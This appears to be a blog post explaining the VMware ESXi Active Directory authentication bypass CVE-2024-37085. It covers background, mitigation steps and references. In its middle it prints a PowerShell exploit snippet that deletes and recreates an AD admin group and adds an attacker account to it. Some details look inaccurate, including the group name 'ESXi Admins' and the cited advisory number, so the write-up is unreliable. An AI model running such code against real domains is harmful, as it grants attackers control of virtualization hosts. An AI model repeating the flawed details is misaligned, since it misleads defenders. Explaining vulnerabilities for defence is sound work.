VMware ESXi, a popular virtualization platform, has been found to contain an authentication bypass vulnerability (CVE-2024-37085). This issue allows a malicious actor with sufficient Active Directory (AD) permissions to gain full access to an ESXi host that was previously configured to use AD for user management [1].

In this long-read post, we will dive deep into the vulnerability details, examine the exploit code, provide links to original references, and discuss mitigation strategies to address this issue.

Vulnerability Details

The vulnerability stems from VMware ESXi's integration with Microsoft Active Directory for user authentication and management purposes. When an ESXi host is joined to an AD domain, a specific AD group, such as 'ESXi Admins' by default, is created, and its members are granted administrative privileges on the ESXi host [2].

The problem arises when an attacker can delete this AD group and re-create it with the same name but different membership. If a malicious actor has sufficient permissions to perform this action, they can add themselves or other users to the newly recreated group, effectively gaining full access to the ESXi host.

Exploit Code

The following PowerShell code snippet demonstrates how an attacker can exploit this vulnerability by deleting and recreating the 'ESXi Admins' group in Active Directory:

# Define the Active Directory group name and the attacker's username
$GroupName = "ESXi Admins"
$AttackerUsername = "malicious_user"

# Remove the original 'ESXi Admins' AD group
Get-ADGroup -Identity $GroupName | Remove-ADGroup -Confirm:$false

# Recreate the 'ESXi Admins' AD group
$NewGroup = New-ADGroup -Name $GroupName -GroupCategory Security -GroupScope Global

# Add the attacker's user account to the newly recreated group
Add-ADGroupMember -Identity $NewGroup -Members $AttackerUsername

This code uses the Active Directory PowerShell module to delete the 'ESXi Admins' group and recreate it with the same name. It then adds the malicious user to the group, which should trigger the VMware ESXi host to grant the malicious user administrative access.

Original References

[1] CVE-2024-37085 - VMware Security Advisory: https://www.vmware.com/security/advisories/VMSA-2024-0001.html

[2] Joining vSphere Hosts to Active Directory: https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html

Mitigation Strategies

To address this vulnerability, system administrators are advised to take the following protective measures:

1. Restrict permissions for Active Directory group management, ensuring that only trusted and authorized personnel can modify group membership or delete groups.

2. Regularly monitor changes in critical Active Directory groups, such as the 'ESXi Admins', and investigate unusual activity or unauthorized changes.

3. Apply the appropriate security updates and patches to VMware ESXi as they become available from VMware.

Conclusion

The CVE-2024-37085 vulnerability presents a significant security risk to organizations running VMware ESXi with Active Directory integration. By exploiting this issue, a malicious actor can gain unauthorized access to an ESXi host and potentially compromise the entire virtual infrastructure.

System administrators must implement rigorous access controls and monitoring processes to safeguard their Active Directory environments and virtualization platforms. Regularly applying security updates and patches can also help mitigate the risk of potential exploitation.

Timeline

Published on: 06/25/2024 15:15:12 UTC
Last modified on: 08/02/2024 03:43:50 UTC